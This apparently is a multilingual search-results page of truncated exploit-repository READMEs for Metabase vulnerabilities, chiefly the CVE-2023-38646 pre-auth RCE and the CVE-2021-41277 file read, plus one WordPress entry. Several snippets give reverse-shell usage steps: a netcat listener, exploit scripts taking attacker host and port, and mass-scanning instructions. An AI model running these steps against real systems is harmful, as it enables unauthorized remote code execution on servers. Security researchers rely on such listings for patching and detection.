388 matches found
CVE-2023-38646
Metabase 预认证远程代码执行 CVE-2023-38646 我们提供了两个文件: CVE-2023-38646-POC.py 用于检查任意 Metabase 实例是否泄露 setup-token。 CVE-2023-38646-Reverse-Shell.py 用于在攻击者控制的机器上获得反向 shell。 CVE-2023-38646-POC.py CVE-2023-38646-Reverse-Shell.py 如何使用 root@kitploit: git clone https://github.com/securezeron/CVE-2023-38646 cd...
CVE-2026-59827
CVE-2026-59827 — Metabase 中 H2 查询结果的不安全反序列化 GHSA-w95f-x9v9-wv36 | CVSS 9.9 严重 | CWE-502:不可信数据的反序列化 概述 CVE-2026-59827 是 Metabase(流行的开源商业智能与数据分析平台)中的一个严重远程代码执行漏洞。该缺陷源于 Metabase 处理 H2 数据库连接返回的查询结果的方式。当针对 H2 数据源的原生 SQL 查询返回一个类型为 OTHER 的列时,Metabase 会在不做任何验证的情况下将该列的原始字节反序列化为 Java...
CVE-2021-41277
CVE-2021-41277 利用 Metabase 的简单程序 安装 gem install httparty gem install colorize gem install timeout ruby CVE.rb...
metabase-pre-auth-rce-poc
Metabase Pre-Auth RCE CVE-2023-38646 POC Este es un script escrito en Python que permite la explotación de la falla de seguridad del software Metabase descrita en CVE-2023-38646. El sistema es vulnerable en versiones anteriores a la 0.46.6.1 , en la edición de código abierto, y anteriores a la...
Metabase - Unauthenticated SQL Injection
Metabase contains a sql injection caused by improper sanitization of input in the '/resetpassword' database endpoint, letting remote unauthenticated attackers gain administrator access, exploit requires no special privileges. id: CVE-2026-72898 info: name: Metabase - Unauthenticated SQL Injection...
Metabase - Local File Inclusion
Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map admin-settings-maps-custom maps-add a map support and potential local file inclusion including environment variables. URLs were not...
PoC-Metabase-CVE-2021-41277
此存储库没有 README。...
cve-2023-38646-poc
Metabase Pre Authentication RCE CVE-2023-38646 CVE-2023-38646 es una vulnerabilidad de ejecución remota de código en Metabase. Esta vulnerabilidad se debe a un defecto de seguridad en el manejo de las cadenas de conexión JDBC por parte de Metabase al procesar el punto final de API no autenticado...
Metabase-Pre-Auth-RCE-POC
CVE-2023-38646 — Metabase 远程代码执行 RCE 概念验证 概述 本仓库记录了一个概念验证 PoC 安全研究项目 ,分析影响Metabase 易受攻击版本的严重预认证远程代码执行 RCE 漏洞 CVE-2023-38646 。 该项目的目标是展示真实世界漏洞的完整生命周期 ,包括: 理解漏洞及其根本原因 在受控实验环境中复现利用 在易受攻击系统上建立反向 Shell 通过网络监控工具 观察攻击行为 展示检测工程技术 提出防御缓解策略 本仓库旨在展示以下方面的实践技能: 漏洞研究 利用复现 反向 Shell 使用 网络流量分析 入侵检测系统 安全缓解策略 漏洞背景...
CVE-2023-38646
Metabase 预认证RCE POC - CVE-2023-38646 Metabase开源版0.46.6.1之前及Metabase企业版1.46.6.1之前存在漏洞,允许攻击者在服务器上执行任意命令。我直接编写了脚本以在攻击者机器上获取反向shell。 用法 该脚本需要目标URL、攻击者IP和端口。此漏洞利用无需提供设置令牌,因为脚本会尝试从 /api/session/properties 获取它。 确保在攻击者机器上启动netcat监听器,使用以下命令: nc -nlvp Port 运行POC脚本时使用: -u - 目标URL Metabase -ip - 攻击者IP -p - 端...
CVE-2023-38646
CVE-2023-38646 Metabase 预认证远程代码执行 2023年11月26日 Metabase 开源版 0.46.6.1 之前版本以及 Metabase 企业版 1.46.6.1 之前版本允许攻击者以服务器权限级别在服务器上执行任意命令。利用该漏洞无需身份认证。其他已修复的版本包括 0.45.4.1、1.45.4.1、0.44.7.1、1.44.7.1、0.43.7.2 和 1.43.7.2。 该漏洞存在于应用程序暴露的 setup-token 中,该 token 可用于 api/setup/validate 接口验证数据库。未授权用户可以创建恶意代码并执行任意命令。 免责...
CVE-2023-38646
CVE-2023-38646 El script original proviene de securezeron Durante mis pruebas, descubrí que la shell inversa generada por este PoC fallaba en la explotación tras la codificación base6 debido al carácter '=' al final. Lo modifiqué ligeramente para resolver este problema. root@kitploit: 原始的生成revers...
CVE-2021-41277
CVE-2021-41277 用法 1. 显示帮助信息 root@kitploit: /CVE-2021-41277 ❯ go run main.go -h Usage of main: -f string File containing list of targets to verfity -o string File to write output to optional -s Show VulnInfo output -t int Number of concurrent goroutines for resolving default 10 -u string Target to...
CVE-2022-21661
CVE-2022-21661 CVE-2022-21661 docker and poc functions.php需要替换原本镜像里的functions.php,docker-compose.yml里直接挂载进去 poc root@kitploit: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: your-ip:8080 User-Agent: Mozilla/5.0 Windows NT 10.0; Win64; x64; rv:132.0 Gecko/20100101 Firefox/132.0 Accept:...
CVE-2021-41277
CVE-2021-41277 概念验证 Metabase 是一个开源数据分析平台。在某些版本的 Metabase 中发现了本地文件包含问题。以下是用于判断目标是否存在此漏洞的概念验证代码。攻击者可以读取 Metabase 服务器上的任意文件。 Build root@kitploit: go build -o CVE-2021-41277 main.go Install root@kitploit: go get github.com/tahtaciburak/CVE-2021-41277 PoC root@kitploit: cat targets.txt | ./CVE-2021-41...
CVE-2023-38646
Poc-Metabase-Preauth-CVE-2023-38646 ¿Cómo usarlo? root@kitploit: λ cve git clone https://github.com/LazyySec/CVE-2023-38646.git λ cve cd Poc-Metabase-Preauth-CVE-2023-38646 λ Poc-Metabase-Preauth-CVE-2023-38646 git:main go build CVE-2023-38646-Exploit.go λ Poc-Metabase-Preauth-CVE-2023-38646...
CVE-2023-38646
CVE-2023-38646-exploit “该漏洞编号为 CVE-2023-38646,允许攻击者在无需任何身份验证的情况下在服务器上执行任意命令。” 针对 cve-2023-38646 的快速反向 Shell 利用脚本。 此漏洞并非我发现的,我只是编写了这个脚本。 使用方法 root@kitploit: root@box:/CVE-2023-38646 python3 exploit.py / \ \ / / | | \ / \ | \ | \ / \ / /| || | / / | | \ \ / /| | | | | | | | | |/ /| || | / / | | \ /...
CVE-2021-41277
CVE-2021-41277 MetaBase 任意文件读取漏洞 fofa批量poc 声明 本poc仅用于检测目标是否存在漏洞,严禁用于任何非授权测试,作者不负任何责任。 使用说明 在fofa.txt中填入fofa普通会员账号的email和key,如果是高级会员或者企业会员的话,在python程序中修改对应的可查询数据量 直接运行即可...
CVE-2023-38646
CVE-2023-38646 Metabase Pre-Auth RCE Metabase open source anterior a 0.46.6.1 y Metabase Enterprise anterior a 1.46.6.1 permiten a los atacantes ejecutar comandos arbitrarios en el servidor, al nivel de privilegio del servidor. No se requiere autenticación para la explotación. Las otras versiones...
CVE-2023-38646
CVE-2023-38646 - Metabase 预认证 RCE ⚠️ 仅供教育和授权的安全研究使用 原始漏洞利用作者 非常感谢原始 PoC 作者 securezeron 步骤指南 1. 在你的攻击者机器上设置监听器: root@kitploit: nc -nlvp 4444 2. 然后,运行此命令: root@kitploit: python3 CVE-2023-38646-Reverse-Shell.py -h python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost...